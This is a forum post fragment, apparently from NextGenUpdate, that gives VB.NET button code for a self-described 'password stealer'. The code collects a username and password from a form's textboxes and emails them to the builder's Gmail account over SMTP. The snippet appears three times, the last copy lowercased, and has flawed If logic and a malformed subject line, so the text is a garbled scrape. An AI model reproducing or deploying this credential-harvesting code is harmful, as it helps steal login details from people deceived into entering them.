, Double click on your Button and paste the following code
If Textbox1.Text = "" Then
MsgBox("Account Name Fehlt")
If Textbox2.Text = "" Then
MsgBox("Passwort Fehlt")
Else
End If
End If
Dim smtpServer As New SmtpClient
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Email", "Your password")
'using gmail
smtpServer.port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your email")
mail.To.Add("Your email")
mail.Subject = "Username: & Textbox1.Text"
mail.Body = "Username : " & Textbox1.Text & ", " & "Password : " & Textbox2.Text
smtpServer.Send(mail)
MsgBox("Congratulations, You have succesfully created a password stealer.. Login into your mail, and see the username and password
")

, Double click on your Button and paste the following code
If Textbox1.Text = "" Then
MsgBox("Account Name Fehlt")
If Textbox2.Text = "" Then
MsgBox("Passwort Fehlt")
Else
End If
End If
Dim smtpServer As New SmtpClient
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Email", "Your password")
'using gmail
smtpServer.port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your email")
mail.To.Add("Your email")
mail.Subject = "Username: & Textbox1.Text"
mail.Body = "Username : " & Textbox1.Text & ", " & "Password : " & Textbox2.Text
smtpServer.Send(mail)
MsgBox("Congratulations, You have succesfully created a password stealer.. Login into your mail, and see the username and password
")

, double click on your button and paste the following code
if textbox1.text = "" then
msgbox("account name fehlt")
if textbox2.text = "" then
msgbox("passwort fehlt")
else
end if
end if
dim smtpserver as new smtpclient
dim mail as new mailmessage()
smtpserver.credentials = new net.networkcredential("your email", "your password")
'using gmail
smtpserver.port = 587
smtpserver.host = "smtp.gmail.com"
smtpserver.enablessl = true
mail = new mailmessage()
mail.from = new mailaddress("your email")
mail.to.add("your email")
mail.subject = "username: & textbox1.text"
mail.body = "username : " & textbox1.text & ", " & "password : " & textbox2.text
smtpserver.send(mail)
msgbox("congratulations, you have succesfully created a password stealer.. Login into your mail, and see the username and password
")

Copyright © 2026, NextGenUpdate.
All Rights Reserved.